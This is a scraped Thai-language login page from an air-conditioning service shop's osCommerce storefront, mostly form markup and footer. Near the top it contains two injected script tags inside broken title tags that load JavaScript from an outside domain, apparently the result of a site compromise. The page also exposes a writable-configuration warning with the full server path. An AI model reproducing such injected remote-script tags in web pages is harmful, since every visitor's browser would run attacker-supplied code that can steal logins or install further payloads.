ระวัง ระวัง: ข้อมุลการตั้งค่าของระบบสามารถแก้ไขได้ที่ /home/totaline/domains/samuitotaline.com/public_html/includes/configure.php. กรุณาตั้งค่าเป็นการอ่านอย่างเดียว หรือจำกัดการเขียน (644 ในยูนิกซ์) เพื่อความปลอดภัยของระบบ
</title><script src=http://dragosimport.com/js/></script><title> </title><script src=http://dragosimport.com/js/></script><title>


SHOPPING CART
now in your cart 0 items
  
หมวดสินค้า
ศูนย์บริการ ล้างแอร์ ซ่อมแอร์
บทความน่าสนใจ
ผู้ผลิต
carrier

Central Air

Toshiba

Totaline

Refrigo
ยินดีต้อนรับ, กรุณาเข้าสู่ระบบ ยินดีต้อนรับ, กรุณาเข้าสู่ระบบ
ลูกค้าใหม่ สมาชิก
กรณีลูกค้าใหม่

สามารถสมัครสมาชิกที่ แล้วคุณจะสามารถซื้อสินค้าได้อย่างรวดเร็ว, รู้สถานะการสั่งซื้อ, และรู้ประวัติการสั่งซื้อที่ผ่านมา<br><br>กรุณาคลิกที่ปุ่ม 'ไปต่อ' เพื่อสมัครสมาชิก</td> </tr> <tr> <td><img src="images/pixel_trans.gif" border="0" alt="" width="100%" height="10"></td> </tr> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr> <td width="10"><img src="images/pixel_trans.gif" border="0" alt="" width="10" height="1"></td> <td align="right"><a href="http://www.samuitotaline.com/create_account.php"><img src="includes/languages/thai/images/buttons/button_continue.gif" border="0" alt="ไปต่อ" title=" ไปต่อ " width="85" height="25"></a></td> <td width="10"><img src="images/pixel_trans.gif" border="0" alt="" width="10" height="1"></td> </tr> </table></td> </tr> </table></td> </tr> </table></td> <td width="50%" height="100%" valign="top"><table border="0" width="100%" height="100%" cellspacing="1" cellpadding="2" class="infoBox"> <tr class="infoBoxContents"> <td><table border="0" width="100%" height="100%" cellspacing="0" cellpadding="2"> <tr> <td colspan="2"><img src="images/pixel_trans.gif" border="0" alt="" width="100%" height="10"></td> </tr> <tr> <td class="main" colspan="2">กรณีสมาชิกกรุณาเข้าระบบที่ฟอร์มต่อไปนี้</td> </tr> <tr> <td colspan="2"><img src="images/pixel_trans.gif" border="0" alt="" width="100%" height="10"></td> </tr> <tr> <td class="main"><b>อีเมล์:</b></td> <td class="main"><input type="text" name="email_address"></td> </tr> <tr> <td class="main"><b>รหัสผ่าน:</b></td> <td class="main"><input type="password" name="password" maxlength="40"></td> </tr> <tr> <td colspan="2"><img src="images/pixel_trans.gif" border="0" alt="" width="100%" height="10"></td> </tr> <tr> <td class="smallText" colspan="2"><a href="http://www.samuitotaline.com/password_forgotten.php">ลืมรหัสผ่าน? คลิกที่นี่.</a></td> </tr> <tr> <td colspan="2"><img src="images/pixel_trans.gif" border="0" alt="" width="100%" height="10"></td> </tr> <tr> <td colspan="2"><table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr> <td width="10"><img src="images/pixel_trans.gif" border="0" alt="" width="10" height="1"></td> <td align="right"><input type="image" src="includes/languages/thai/images/buttons/button_login.gif" border="0" alt="เข้าระบบ" title=" เข้าระบบ "></td> <td width="10"><img src="images/pixel_trans.gif" border="0" alt="" width="10" height="1"></td> </tr> </table></td> </tr> </table></td> </tr> </table></td> </tr> </table></td> </tr> </table></form></td> <!-- body_text_eof //--> <td width="0" valign="top"><table border="0" width="0" cellspacing="0" cellpadding="2"> <!-- right_navigation //--> <!-- right_navigation_eof //--> </table></td> </tr> </table> <!-- body_eof //--> <!-- footer //--> <table border="0" width="100%" cellspacing="0" cellpadding="0" bgcolor="#232323"> <tr> <td align="left" class="smallText" style="color:#FFFFFF; height:80px;"> <table align="center" border="0" width="1024" cellspacing="0" cellpadding="1"> <tr class="footer"> <td class="footer">   29 กันยายน, 2023  </td> <td align="right" class="footer">  1448723 หน้าถูกแสดงตั้งแต่ 06 กุมภาพันธ์, 2010  </td> </tr> <tr> <td style="color:#FFFFFF;" class="footer">Copyright © 2010 <a href="http://www.samuitotaline.com" target="_blank">Samui Totaline Co., Ltd.</a><br>Powered by <a href="http://www.aloha69design.com" target="_blank">Aloha69</a></td><td> </td> </tr> </table> </td> </tr> </table> <br> <!--table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td align="center"><a href="http://www.samuitotaline.com/redirect.php?action=banner&goto=1" target="_blank"></a></td> </tr> </table--> <!-- footer_eof //--> <br> </body> </html>